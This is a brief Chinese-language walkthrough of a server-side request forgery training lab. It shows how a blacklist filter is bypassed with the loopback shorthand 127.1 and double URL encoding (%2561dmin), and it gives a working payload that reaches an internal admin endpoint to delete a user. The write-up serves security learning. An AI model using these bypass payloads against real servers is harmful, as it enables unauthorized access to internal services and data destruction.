# SSRF Lab4 本題 SSRF with blacklist-based input filter,重點是繞過不嚴謹的過濾規則,尤其針對 localhost、127.0.0.1 這類敏感地址或路徑進行封鎖。 一樣進入網站攔截請求。 ![image](https://hackmd.io/_uploads/B1Fg-8QSeg.png) ![image](https://hackmd.io/_uploads/ByuYVUQrxe.png) 伺服器會擋住以下狀況: - `stockApi=http://localhost/...` - `stockApi=http://127.0.0.1/...` - `stockApi=http://127.0.0.1/admin` - `admin` 字串也可能被 blacklist。 這裡用 127.1 取代 127.0.0.1,畢竟也是合法縮寫。 ![image](https://hackmd.io/_uploads/S1XkLL7Sxg.png) 200 狀態碼代表有繞過,再來是 admin 字串,如果直接輸入是不行的。 ![image](https://hackmd.io/_uploads/HkSmUIQSgl.png) 所以來個雙重編碼炸他。 ``` a → %61 → %2561 ``` 因此: ``` http://127.1/%2561dmin/delete?username=carlos ``` ![image](https://hackmd.io/_uploads/HJ0sULQBgl.png) ![image](https://hackmd.io/_uploads/SyunUIXBgl.png) ---